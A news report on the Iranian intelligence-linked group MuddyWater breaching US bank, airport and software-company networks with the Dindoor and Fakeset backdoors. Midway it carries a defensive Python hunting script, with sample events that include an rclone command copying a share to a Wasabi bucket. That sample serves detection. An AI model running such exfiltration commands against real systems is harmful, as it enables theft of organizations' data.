Iranian Intelligence-Backed Hackers Breach US Bank, Airport Networks

Regulation Reporter

Iranian Ministry of Intelligence-linked MuddyWater cyber crew embedded in US networks since February, deploying custom backdoors and exfiltrating data from critical infrastructure.

Iranian cyber operatives linked to Tehran's intelligence apparatus have infiltrated networks belonging to a US bank, airport, and software company, deploying custom malware and attempting data exfiltration in a campaign that began before recent military strikes in the region.

Iranian Intelligence Operation Targets Critical Infrastructure

The cyber crew, known as MuddyWater and believed to be part of Iran's Ministry of Intelligence and Security (MOIS), has maintained a presence on multiple US organizations' networks since early February, according to researchers from Symantec and Carbon Black's threat hunting team. The infiltration includes a major US bank, a software firm that supplies technology to defense and aerospace industries, and an airport, along with non-governmental organizations in both the United States and Canada.

The timing of these intrusions is particularly concerning, as the threat actors were already embedded in US and Israeli networks before the current hostilities began. This positions the group to potentially launch disruptive attacks on compromised systems at any moment, security analysts warn.

Custom Malware Arsenal Discovered

Researchers uncovered a previously unknown backdoor they've named "Dindoor" during their investigation. This malware uses Deno, a secure runtime for JavaScript and TypeScript, to execute its operations. The backdoor was signed with a certificate issued to "Amy Cherne" and was found on networks belonging to the Israeli software company, the US bank, and a Canadian nonprofit organization.

A separate Python-based backdoor called "Fakeset" was discovered on the networks of the airport and a US nonprofit. This malware was signed by certificates issued to both "Amy Cherne" and "Donald Gay." The latter certificate has previously been used to sign Stagecomp and Darkcomp malware, both linked to MuddyWater operations, providing strong evidence of the group's involvement.

Data Exfiltration Attempts

Investigators found evidence that the compromised software company was targeted for data theft using Rclone to transfer files to a Wasabi cloud storage bucket. While it remains unclear whether this exfiltration was successful, the attempt indicates intelligence-gathering motives behind the intrusions.
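The two indicators the reporting above gives defenders something concrete to hunt on: binaries signed with the certificate subjects named in the malware section ("Amy Cherne", "Donald Gay"), and Rclone runs whose destination is a Wasabi bucket. The script below is an added example written for this page, not code from the researchers or from any of the organizations involved. It walks a handful of constructed EDR-style process events (JSON, one per line) and raises findings for those two patterns. The field names (`host`, `image`, `signer`, `cmdline`) and the sample paths are assumptions; Wasabi's S3 endpoints live under `wasabisys.com`.

```python
import json
import re
from dataclasses import dataclass

# Certificate subjects the reporting ties to MuddyWater tooling. A match is a
# pivot for investigation, not a verdict: the names matter only when they show
# up as signers of binaries in your own telemetry.
ABUSED_SIGNERS = {"amy cherne", "donald gay"}

# Wasabi S3 endpoints are hosted under wasabisys.com (regional variants such as
# s3.eu-central-1.wasabisys.com share that suffix).
WASABI_RE = re.compile(r"wasabisys\.com|\bwasabi\b", re.IGNORECASE)


@dataclass
class Finding:
    host: str
    rule: str
    detail: str


def _basename(path: str) -> str:
    # Handle both Windows and POSIX separators without caring which OS produced the event.
    return re.split(r"[\\/]", path)[-1].lower()


def inspect_event(ev: dict) -> list[Finding]:
    """Return zero or more findings for a single process-creation event."""
    findings: list[Finding] = []
    host = ev.get("host", "?")
    image = ev.get("image") or ""
    signer = (ev.get("signer") or "").strip().lower()
    cmdline = ev.get("cmdline") or ""

    # Rule 1: code-signing certificate subject on the abused-signer list.
    if signer in ABUSED_SIGNERS:
        findings.append(Finding(host, "abused-code-signer", f"{image} signed by {ev.get('signer')}"))

    # Rule 2: rclone is a legitimate tool, so only the destination decides severity.
    if _basename(image) in ("rclone", "rclone.exe"):
        if WASABI_RE.search(cmdline):
            findings.append(Finding(host, "rclone-to-wasabi", cmdline))
        else:
            # The remote may hide the endpoint in rclone.conf; still worth a look.
            findings.append(Finding(host, "rclone-seen", cmdline))
    return findings


def hunt(lines) -> list[Finding]:
    """Run inspect_event over newline-delimited JSON events, skipping blank lines."""
    findings: list[Finding] = []
    for line in lines:
        line = line.strip()
        if line:
            findings.extend(inspect_event(json.loads(line)))
    return findings


# Constructed sample telemetry (not real events): a benign service, a Deno
# runtime signed with one of the reported subjects, an rclone copy to a Wasabi
# endpoint, and an rclone run whose destination is not visible on the command line.
SAMPLE_EVENTS = r"""
{"host": "ws-017", "image": "C:\\Windows\\System32\\svchost.exe", "signer": "Microsoft Windows", "cmdline": "svchost.exe -k netsvcs"}
{"host": "ws-017", "image": "C:\\Users\\Public\\deno.exe", "signer": "Amy Cherne", "cmdline": "deno.exe run -A main.ts"}
{"host": "srv-db-02", "image": "C:\\Temp\\rclone.exe", "signer": "", "cmdline": "rclone.exe copy D:\\share remote:bucket --s3-endpoint s3.wasabisys.com"}
{"host": "build-01", "image": "/usr/bin/rclone", "signer": "", "cmdline": "rclone sync /var/backups backup:nightly"}
"""

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS.splitlines()):
        print(f"[{f.rule}] {f.host}: {f.detail}")
```

The fourth sample event is the reason the lower-severity `rclone-seen` rule exists: rclone normally resolves the endpoint from a named remote in its config file, so a command line alone cannot prove where data went. Pair the hunt with egress logs (DNS or proxy hits on `wasabisys.com`) before concluding anything, and treat a signer match as a reason to pull the binary's hash and full certificate chain rather than as confirmation by itself.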

The software company's connections to defense and aerospace industries, combined with its presence in Israel, suggest that Israeli operations may be the primary target of this campaign. The discovery of Dindoor specifically on the Israeli location's networks supports this assessment.

Persistent Threat Actor

MuddyWater, also known as Seedworm and Static Kitten, has been conducting cyber campaigns on behalf of Iranian intelligence since approximately 2018. The group typically gains initial access through phishing emails or by exploiting vulnerabilities in public-facing applications, though the specific entry point for this campaign remains unknown.

Iranian cyber operations span a range of motives, from intelligence gathering to potential disruption. While the current campaign appears focused on data collection, security analysts note that groups like MuddyWater could pivot to disruptive attacks on organizations they've already compromised, especially in response to escalating regional tensions.

Broader Regional Cyber Conflict

The discovery comes amid heightened cyber activity in the Middle East following military strikes. Check Point security researchers reported tracking "hundreds" of exploitation attempts targeting internet-connected surveillance cameras across Israel and other Middle Eastern countries since the conflict began on February 28.

In a related incident from May 2025, MuddyWater compromised a server containing live CCTV streams from Jerusalem, allowing the crew to surveil the city for potential targets. On June 23, the same day Iran bombed Jerusalem, Israeli authorities reported that Iranian forces were exploiting compromised security cameras to collect real-time intelligence and adjust missile targeting.

While analysts have observed an increase in spying expeditions, digital probes, and distributed denial-of-service attacks in recent weeks, no major disruptive cyberattacks have materialized thus far. However, the pre-positioned access that MuddyWater maintains on critical US and Israeli networks represents a significant threat that could materialize at any time.

The FBI, US Cybersecurity and Infrastructure Security Agency (CISA), and UK National Cyber Security Centre (NCSC) continue to track MuddyWater's activities, emphasizing the persistent nature of state-sponsored cyber threats in an increasingly volatile geopolitical landscape.
